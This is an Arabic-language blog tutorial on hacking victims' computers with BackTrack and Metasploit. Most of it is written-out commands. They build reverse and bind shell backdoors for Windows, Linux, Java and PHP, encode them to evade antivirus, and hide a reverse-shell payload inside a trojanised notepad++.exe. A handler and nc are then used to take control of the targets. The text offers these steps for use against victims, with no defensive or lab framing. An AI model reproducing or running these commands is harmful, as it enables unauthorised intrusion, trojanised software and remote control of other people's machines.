بسم الله الرحمن الرحيم
و السلام عليكم و رحمة الله و بركاته
اليوم اخواني ساضع درس مهم لطريقة اختراق الاجهزة
بالياكتراك عن طريق الاختراق الخارجي و الداخلي
كما سيتم شرح طريقة صتاعة الباكدور بجميع الصيغ
الشرح سهل جدا ويتطلب منك التوفر على نظام الباكتراك
وادا اردت شرح طريقة التنصيب قم بالضغط على احدى
الشروحات التالية
الان اخواني ساترككم مع الشرح بالفيديو على اليوتوب
مستلزمات : بورت مفتوح في حالة اتصال عكسي
تبيت الضحايا : ايبي ضحية وايبي تبعك يجب ان يكونان مثبتين او بعد اختراق ترفع سرفر ﻻي برنامج اختراق
------------------------------------------------msfpayload ------------------------------------------
msfpayload -l
معرفة الخيارت الخاصة بكل بايلود
msfpayload windows/shell_bind_tcp O
--------------------------------------------windows backdoor--------------------------------------
بابلود يعتمد على اتصال عكسي
msfpayload windows/meterpreter/reverse_tcp lhost= lport= X > back.exe
اتصال مباشر
--> msfpayload windows/meterpreter/bind_tcp lport= X > back.exe
------------------------------------------
تنصت على الهدف في حالة بايلود perl / ruby /php
nc ip port
------------------------------------------------مرحلة التشفير------------------------------------------
msfencode -l
امر التشفير في الميتا او في كونسول
msfencode -t exe -x back.exe -o back_crypt.exe -e x86/shikata_ga_nai -c 3
حقن الباكدور في ملف exe مع تشفيرا
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.191 LPORT=443 R | msfencode -t exe -x notepad++.exe -o notepad++_crypt.exe -e x86/shikata_ga_nai -c 3
--> ------------------------------------------Linux backdoor--------------------------------------
msfpayload linux/x86/meterpreter/bind_tcp LPORT=80 R | msfencode -t elf > linux_meterpreter
chmod u+x linux_meterpreter
./linux_meterpreter
------------------------------------------java backdoor--------------------------------------
./msfpayload java/meterpreter/reverse_tcp LHOST= LPORT= J > back.jar
./msfpayload java/meterpreter/bind_tcp LPORT= J > back.jar
------------------------------------------php Backdoor--------------------------------------
msfpayload php/meterpreter/reverse_tcp LHOST= LPORT= R > back.php
شفره ب base 64 بنفسك
الأن طريقة ربط اتصال مع الهدف
msfconsole
use exploit/multi/handler
use multi/handler
set PAYLOAD البايلود الذي وضعت
set LPORT البورت
set RHOST [ايبي الهدف ]
---------------------------------------------------------------------------------------------------------------
Arabezy--Arabezy--Arabezy-Arabezy--Arabezy--Arabezy--Arabezy--Arabezy
----------------------------------------------------------------------------------------------------------------
والان مع نهاية الدرس
اتمنى ان يعجبكم الشرح ولا تنسو
اخواني الضغط على لايك او شير
ادا اعجبك الموضوع و من هنا اشكر صاحب الفيديو
إرسال تعليق